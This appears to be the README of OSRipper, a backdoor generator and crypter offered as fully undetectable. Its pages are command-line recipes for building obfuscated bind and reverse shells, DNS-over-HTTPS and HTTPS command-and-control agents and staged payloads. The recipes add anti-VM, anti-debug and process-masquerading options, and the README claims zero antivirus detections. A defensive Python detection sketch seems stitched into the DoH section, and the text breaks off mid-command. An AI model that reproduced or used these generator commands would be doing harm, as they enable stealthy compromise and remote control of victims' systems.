OSRipper
AV evading cross-platform Backdoor and Crypter Framework with an integrated lightweight webUI
OSRipper v0.4.2
<div align="center">
Advanced cross-platform payload generator and crypter with FUD capabilities
</div>

Overview
OSRipper is a sophisticated, fully undetectable (FUD) backdoor generator and crypter designed for authorized penetration testing and red team operations. It features advanced evasion techniques, multiple payload types, and a modern web-based C2 interface for managing compromised systems.
Key Highlights
- Fully Undetectable (FUD) - Advanced evasion techniques bypass modern AV solutions
- Web-Based C2 Interface - Modern dashboard for managing active sessions
- Multiple Payload Types - Bind shells, reverse shells, DoH C2, HTTPS C2, and more
- Multi-Layer Obfuscation - Standard and enhanced obfuscation with randomized variables
- Binary Compilation - Compile payloads to standalone executables
- Encrypted Communications - SSL/TLS and certificate-pinned HTTPS C2 channels
- Stealth Features - VM detection, anti-debugging, process masquerading
Features
Payload Generation
| Payload Type | Description | Use Case |
|-------------|-------------|----------|
| Bind Shell | Opens port on victim machine | Direct access when reverse connections blocked |
| Reverse TCP Meterpreter | SSL/TLS encrypted reverse connection | Standard penetration testing |
| DNS-over-HTTPS C2 | Stealthy DoH-based command & control | Bypass network restrictions |
| HTTPS C2 | Certificate-pinned HTTPS C2 | Secure, authenticated C2 channel |
| Staged Payload | Multi-stage web delivery | Enhanced stealth deployment |
| Custom Code Crypter | Obfuscate any Python script | Custom payload encryption |
Evasion Techniques
- Advanced Obfuscation - Multi-layer code encoding with random variables
- Enhanced Obfuscation - Anti-debug, VM detection, junk code injection
- Anti-VM Detection - Sandbox and virtual machine evasion
- Stealth Delays - Random startup delays (5-15 seconds)
- Process Masquerading - Disguise as legitimate system processes
- Signature Randomization - Every payload is unique
Web UI Features
- Session Dashboard - View all active C2 sessions
- Interactive Terminal - Execute commands via web interface
- Payload Generator - Generate payloads directly from web UI
- Session Management - View system info, command history, and manage sessions
- Real-time Updates - Live command execution and response viewing
Advanced Capabilities
- Ngrok Integration - Automatic tunnel creation for dynamic IPs
- Certificate Pinning - Secure HTTPS C2 with certificate validation
- Session Persistence - Maintain connections across restarts
- Command Queueing - Queue commands for offline agents
- Response Parsing - Automatic parsing of command output
Quick Start
Installation
```bash
# Clone repository
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Install dependencies
pip3 install -r requirements.txt
# Install package
pip3 install -e .
```
Important — run setup for optional features (ngrok, binary compilation):
On many systems (especially Linux with an externally-managed Python environment), you must run the built-in setup so optional dependencies are installed into OSRipper’s own venv. Do this once after installation:
```bash
osripper-cli setup
```
This creates ~/.local/share/osripper/venv, installs pyngrok, nuitka, and sandboxed there, and all later runs of osripper / osripper-cli will use them automatically. Without this, --ngrok and --compile will prompt you to run setup. Use osripper-cli setup --system only if you prefer a system/user pip install instead of the venv.
Basic Usage
Interactive Mode:
```bash
osripper
# or
python3 -m osripper
```
Command Line:
```bash
# Generate reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Generate DoH C2 payload
osripper-cli doh -d example.com --obfuscate --compile
```
Web UI:
```bash
# Start C2 server with web UI
python -m osripper.c2.server example.com --port 5000
# Access dashboard at http://localhost:5000
```
Web UI
OSRipper includes a modern web-based C2 interface for managing compromised systems.
Features
- Dashboard - Overview of all active sessions
- Session Management - View system information and execute commands
- Payload Generator - Generate DoH and HTTPS payloads via web interface
- Command History - Track all executed commands and responses
- Real-time Updates - Live command execution and response viewing
Starting the C2 Server
```bash
# Basic usage
python -m osripper.c2.server example.com
# With HTTPS
python -m osripper.c2.server example.com --https
# Custom port
python -m osripper.c2.server example.com --port 8080
# With custom certificate
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
```
Accessing the Web UI
Once the server is running, access the dashboard at:
- HTTP: http://localhost:5000
- HTTPS: https://localhost:5000 (if enabled)
Payload Types
1. Bind Shell Backdoor
Opens a port on the victim machine and waits for connections.
```bash
osripper-cli bind -p 4444 --obfuscate --compile
```
Connection:
```bash
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
```
2. Reverse TCP Meterpreter
Encrypted reverse connection with SSL/TLS.
```bash
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
```
3. DNS-over-HTTPS C2
Stealthy C2 channel using DNS-over-HTTPS protocol. Bypasses many network restrictions.
```bash
# Generate payload
osripper-cli doh -d example.com --obfuscate --compile
# Start C2 server
python -m osripper.c2.server example.com
```
Features:
- Stealthy DNS-based communication
- Web UI for session management
- Automatic session persistence
- Command queueing for offline agents
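On the monitoring side, an agent polling over DoH appears as repeated HTTPS connections to a DoH resolver from a binary that is not a browser. The sketch below is an added example, not OSRipper code; it assumes the agent uses a public resolver (the page does not say which), and the log format, allowlist paths and `min_hits` threshold are hypothetical.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Well-known public DoH endpoints (sample list; extend for your environment).
DOH_HOSTS = {"cloudflare-dns.com", "mozilla.cloudflare-dns.com", "dns.google", "dns.quad9.net"}
# Assumption: images expected to speak DoH, matched on full path because a
# masquerading process can borrow a name far more easily than a path.
ALLOWED_IMAGES = {"/usr/lib/firefox/firefox", "/opt/google/chrome/chrome"}
# Hypothetical egress log format: "<ts> host=<h> image=<path> sni=<name>"
LINE_RE = re.compile(r"^(\S+) host=(\S+) image=(\S+) sni=(\S+)$")
# Constructed sample events, not real telemetry.
SAMPLE = """\
2024-05-01T10:00:00Z host=ws-17 image=/usr/lib/firefox/firefox sni=mozilla.cloudflare-dns.com
2024-05-01T10:00:03Z host=ws-22 image=/tmp/.cache/firefox sni=dns.google
2024-05-01T10:00:10Z host=ws-17 image=/usr/lib/firefox/firefox sni=example.org
2024-05-01T10:00:33Z host=ws-22 image=/tmp/.cache/firefox sni=dns.google
2024-05-01T10:00:40Z host=ws-30 image=/usr/bin/curl sni=cloudflare-dns.com
2024-05-01T10:01:03Z host=ws-22 image=/tmp/.cache/firefox sni=dns.google
2024-05-01T10:01:34Z host=ws-22 image=/tmp/.cache/firefox sni=dns.google
truncated line without fields
2024-05-01T10:02:03Z host=ws-22 image=/tmp/.cache/firefox sni=dns.google
""".splitlines()

def flag_doh_clients(lines, min_hits=4):
    """Flag non-allowlisted images that repeatedly connect to DoH resolvers."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed records instead of failing the run
        ts, host, image, sni = m.groups()
        if sni.lower() in DOH_HOSTS and image not in ALLOWED_IMAGES:
            stamp = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
            seen[(host, image, sni.lower())].append(stamp)
    findings = []
    for (host, image, sni), stamps in sorted(seen.items()):
        if len(stamps) < max(min_hits, 2):
            continue  # a single lookup is weak evidence and has no interval
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        findings.append({"host": host, "image": image, "sni": sni,
                         "hits": len(stamps), "mean_gap_s": round(mean(gaps), 1),
                         "gap_stdev_s": round(pstdev(gaps), 1)})
    return findings

if __name__ == "__main__":
    print(flag_doh_clients(SAMPLE))
```

Tight, regular gaps point to polling, but jitter raises the spread, so treat the hit count from an unexpected image path as the primary signal.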
4. HTTPS C2 (Certificate Pinning)
Secure HTTPS C2 with certificate pinning for authentication.
```bash
# Generate payload (via web UI or CLI)
# Start C2 server with HTTPS
python -m osripper.c2.server example.com --https
# Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint
```
Features:
- Certificate pinning for security
- Encrypted HTTPS communication
- Web UI integration
- Session management
5. Staged Payload
Multi-stage web delivery for enhanced stealth.
```bash
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
```
6. Custom Code Crypter
Obfuscate and encrypt any Python script.
```bash
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
```
Command Line Interface
Common Options
| Option | Description |
|-------|-------------|
| --obfuscate | Enable multi-layer obfuscation |
| --enhanced | Enhanced obfuscation (anti-debug, VM detection) |
| --compile | Compile to standalone binary |
| --icon PATH | Custom icon for compiled binary |
| --delay | Add random startup delay (5-15 seconds) |
| --output, -o NAME | Output filename |
| --quiet, -q | Quiet mode (minimal output) |
Examples
```bash
# Full-featured reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
    --obfuscate --enhanced --compile --icon app.ico --delay
# DoH C2 with all features
osripper-cli doh -d example.com \
    --obfuscate --enhanced --compile --delay
# Custom script encryption
osripper-cli custom --script malware.py \
    --obfuscate --enhanced --compile
# Using ngrok for dynamic IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile
```
Detection Results
Latest VirusTotal Scans
- Python Payload: 0/68 Detection Rate
- Compiled Binary: 0/68 Detection Rate

Architecture
```
┌─────────────────┐
│    Generated    │
│     Binary      │
└─────────────────┘
         │
         │ Execute
         ▼
┌──────────────────┐
│    Obfuscated    │
│     Dropper      │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│    C2 SERVER    │
│    (Web UI)     │
│                 │
└─────────────────┘
         │
         │ Command/Response
         ▼
┌─────────────────┐
│      Agent      │
│    Execution    │
└─────────────────┘
```

Advanced Configuration
Ngrok Integration
```bash
# Generate payload with ngrok
osripper-cli reverse --ngrok -p 4444
# Follow prompts to set up tunnel
# Run: ngrok tcp 4444
```
Custom Icons
```bash
osripper-cli reverse -H 192.168.1.100 -p 4444 \
    --compile --icon /path/to/icon.ico
```
Obfuscation Levels
Standard Obfuscation:
- Multi-layer encoding
- Variable randomization
- Code structure obfuscation
Enhanced Obfuscation:
- All standard features
- Anti-debugging techniques
- VM detection
- Junk code injection
- Advanced evasion
```bash
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Enhanced
os
```
